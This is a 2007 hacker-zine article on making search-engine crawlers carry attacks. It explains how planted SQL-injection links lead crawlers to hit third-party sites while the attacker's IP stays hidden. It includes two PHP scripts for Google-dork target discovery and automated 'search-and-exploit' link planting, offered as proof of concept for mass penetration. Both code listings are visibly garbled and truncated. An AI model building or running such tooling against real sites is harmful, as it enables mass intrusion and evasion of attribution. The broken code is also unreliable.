I, Bot. Taking advantage of robots power (Article)

Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 

Date: 2007-04-18


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion


---[ 0x00: Intro, let's start ]

Hello, everybody. I apologize for my poor English; it is not my first
language, and I hope you will excuse any errors ;)

This paper is a reply to an article published in Phrack by Michal Zalewski.
He was the first to propose taking advantage of the multitude of robots that
continuously scan the web in search of information.
We begin with the introduction to Zalewski's article, then see how to
implement his ideas when writing our own bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now let's see how all this is possible in reality ;) Have fun!


---[ 0x01: Abstract ]

The idea that search engines (Google first of all) can be turned into powerful
weapons in the hands of attackers is not new.
Google hacking, search dorks and cache digging are all techniques that take
advantage of a small part of what the engines know, but very few people, until
now, have thought of using their most sensitive and powerful part,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This is not the case; a robot simply visits sites
by requesting documents from them.
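
To make the definition concrete, here is a minimal sketch of the step a robot
repeats on every document it retrieves: finding the referenced documents.
It is only an illustration in Python, not code from any real robot. The names
LinkCollector and extract_links, the sample page and the host example.org are
all assumptions made for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class LinkCollector(HTMLParser):
    """Collects the absolute URL of every <a href> found in a page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                # Resolve relative references against the page's own URL.
                self.links.append(urljoin(self.base_url, value))


def extract_links(base_url, html):
    """Return the list of documents referenced by one page."""
    collector = LinkCollector(base_url)
    collector.feed(html)
    return collector.links


# Hypothetical page body; example.org is a placeholder host.
SAMPLE_PAGE = """
<html><body>
  <a href="/about.html">About</a>
  <a href="http://example.org/news.php?id=7">News</a>
  <p>No link here</p>
</body></html>
"""

links = extract_links("http://example.org/index.html", SAMPLE_PAGE)
print(links)
```

A browser stops here and waits for a human to click. A robot takes the list
and requests every entry on its own.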

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate on the web?

For a complete overview you can consult the list of active bots ("The Web
Robots Database", listed among the documents at the end of this article).
We will not go deeper, because this topic is outside the article's scope.


---[ 0x02: Implementation ]

What are the strong points of a bot?
Surely speed: the ability to execute a great number of operations in a
short time.
For exploitation, we can write a bot with a mirroring-like function that,
using the information found in a database or a search engine, can carry out
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It queries a search
engine like Google (or another one) and builds an array with the addresses
of sites that contain specific web pages. If enabled, it can automatically
exploit many types of vulnerability (for example SQL injection).
Although it is a simple script, it can become a destructive weapon if used in
the wrong way (ok noob?).
I therefore ask any lamer readers not to use it to do damage. It is only
a Proof of Concept.

- - - - -

    code:  - - - - -




    if ($argc<2) {
    echo "Usage: ".$argv[0]."  
    ".$argv[0]." /script/vuln.php?cmd= 30



    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function SendPack($packet)
      global $proxy, $host, $port, $proxy_regex;
      if ($proxy=='') {
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
      else {
       $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        if (!$ock) {
          echo 'No response from proxy...';die;
      if ($proxy=='') {
        while (!feof($ock)) {
      else {
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {

    //Global variables
    $host="www.google.com"; //Our vulnerability database ;)
    $path=$argv[1];         //String
    $port=80;               //Port (Web)
    $proxy="";              //For your proxy
    $html;                  //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A"; //Search inurl
    $SeType="&btnG=Search";        //Search type
    if ($argv[2]) $SeNumber="&num=".$argv[2];
    else $SeNumber="&num=20";      //Number of result

    if ($path[0]<>'/')  {print("*warning: string must begin with '/'\n");}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    //$path=urlencode($path);   //Url encoding

    echo "1: Find Targets...\n\n";
    //Google's inurl search (example):

    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";


    /* Find targets urls */
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
    for ($i=0; $i

    - - - - -

- - - - -


---[ 0x03: The code: Paranoid Android ]

Now let's try a different approach: code that uses the crawlers of search
engines in a truly new way.

The operation of a crawler is simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.
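
The seeds and the crawl frontier described above can be sketched in a few
lines. This is a simplified illustration in Python, not the algorithm of any
real search engine: the "web" is a hypothetical in-memory table (FAKE_WEB),
nothing is fetched from the network, and the only policy is first in, first
out with each URL visited once. The function name crawl and the *.example
hosts are assumptions made for this example.

```python
from collections import deque

# Hypothetical in-memory "web": each URL maps to the links found on that page.
FAKE_WEB = {
    "http://a.example/": ["http://a.example/one", "http://b.example/"],
    "http://a.example/one": ["http://a.example/"],
    "http://b.example/": ["http://b.example/item?id=1", "http://c.example/"],
    "http://b.example/item?id=1": [],
    "http://c.example/": [],
}


def crawl(seeds, fetch_links, max_pages=100):
    """Visit URLs breadth-first, starting from the seeds.

    fetch_links(url) returns the hyperlinks found on that page.
    """
    frontier = deque(seeds)      # URLs waiting to be visited
    seen = set(seeds)            # URLs already queued, to avoid loops
    visited = []                 # visit order, for inspection

    while frontier and len(visited) < max_pages:
        url = frontier.popleft()
        visited.append(url)
        for link in fetch_links(url):
            # The crawler does not judge a link; anything new is queued.
            if link not in seen:
                seen.add(link)
                frontier.append(link)
    return visited


order = crawl(["http://a.example/"], lambda url: FAKE_WEB.get(url, []))
for url in order:
    print(url)
```

Note that the page author, not the crawler, decides what enters the frontier:
every link on a.example ends up being requested, whatever host or query
string it names.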

As we can see, this method depends closely on the contents of a web page,
which can send the crawler off to explore numerous other links.
Now we ask ourselves: how safe is this type of method?

Suppose that a visited website contains exploit links (for example SQL
injection) that point to dynamic pages on other websites. What happens in
this case?
The heuristic spider follows the links and injects the code into those websites.
Then it saves all the results in the database of its search engine.
Isn't it fantastic? ;)

And which IP remains in the logs? The IP of the search engine, which, with the
many sites its spider visits every day, will have a hard job finding our
malicious site. If it is willing to search at all...
In any case, even if our site is uncovered, how many more searches are needed
to find the culprit?
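
To see what the administrator of a visited site is left with, here is a small
sketch in Python that parses one access log entry. It assumes the server
writes the common "combined" log format. The sample line is invented for this
example: the address comes from the documentation range 192.0.2.0/24,
"ExampleBot/1.0" is a made-up crawler name, and the empty referer reflects the
assumption that the crawler sends no Referer header.

```python
import re

# Combined log format:
# host ident user [time] "request" status bytes "referer" "agent"
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Hypothetical entry, written by hand for this example.
SAMPLE = (
    '192.0.2.10 - - [18/Apr/2007:10:15:32 +0200] '
    '"GET /item.php?id=1 HTTP/1.0" 200 512 "-" "ExampleBot/1.0"'
)


def parse_entry(line):
    """Return the fields of one access log line, or None if it does not match."""
    match = LOG_LINE.match(line)
    return match.groupdict() if match else None


entry = parse_entry(SAMPLE)
# Everything recorded about the client describes the crawler: its address
# and its user agent. With no referer, the page that carried the link does
# not appear in this entry.
print(entry["ip"], entry["agent"], entry["referer"])
```

In this sketch the only way back to the page that published the link goes
through the operator of the crawler.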

Now, because code is worth more than a thousand words, here is a robot that,
if configured correctly, can use the techniques described in this article.

Voilà Paranoid Android:

- - - - -

    code:  - - - - -

    Paranoid Android, By Crossbower

    $host="www.google.com"; //Our vulnerability database ;) 
    $port=80;                //Port (Web)
    $html;                   //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A";  //Search inurl
    $SeCache="/search?q=cache%3A";  //Search cache
    $SeType="&btnG=Search";         //Search type
    $SeNumber="&num=5";             //Number of result

    //Google's inurl search (example):

    //$string=urlencode($string);   //Url encoding


    echo "        
    --- PARANOID ANDROID ---                
  Automatic SaE (search-and-exploit) Bot
   by Crossbower Crossbower*katamail*com

";

    //Loading...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    function SendPack($packet) {
      global $host, $port;
      $ock=fsockopen(gethostbyname($host),$port);
      if (!$ock) {
        echo 'No response from '.$host.':'.$port; die;
      }
      fputs($ock,$packet);
      $buffer='';
      while (!feof($ock)) {
        $buffer.=fgets($ock);
      }
      fclose($ock);
      return($buffer);
    }

    //START:

    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $html=SendPack($packet);

    //Open log file
    $handle =fopen($LogFile,'a');

    //Initialize the log
    fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."

\n");
    fwrite($handle,"Visited by:
\n");
    $Spider =$REMOTE_HOST."
";
    $Spider.=$HTTP_USER_AGENT."

\n";
    fwrite($handle,$Spider);
    fwrite($handle,"Links (google cache):
\n");
    $Log ="$Log.="http://".$host.$SeCache;

    //Find targets
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
    for ($i=0; $i".$match[1][$i].$exploit."
\n";
      //Update log
      fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."
\n");
    }}

    //Close log
    fwrite($handle,"

\n");
    fclose($handle);
    ?>

    - - - - -

- - - - -

-----------------------------------------------------------------------------[/]


---[ 0x04: Conclusion ]

I hope this information has been of interest to you and has made you
understand the gravity of the attacks that robots could make possible in the
future...

To go deeper, you can read these documents:

- "Against the System: Rise of the Robots", Michal Zalewski
  http://www.phrack.org/archives/57/p57-0x13

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine" (Googlebot
  concept), Sergey Brin, Lawrence Page, Stanford University
  http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm

- "Proprietary web solutions security", Michal Zalewski
  http://lcamtuf.coredump.cx/milpap.txt

- "A Standard for Robot Exclusion", Martijn Koster
  http://info.webcrawler.com/mak/projects/robots/norobots.html

- "The Web Robots Database"
  http://www.robotstxt.org/wc/active.html
  http://www.robotstxt.org/wc/active/html/type.html

- "Web Security FAQ", Lincoln D. Stein
  http://www.w3.org/Security/Faq/www-security-faq.html

Ok, that's all folks... For clarifications, questions or anything else, don't
hesitate to mail me ;)

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

-----------------------------------------------------------------------------[/]
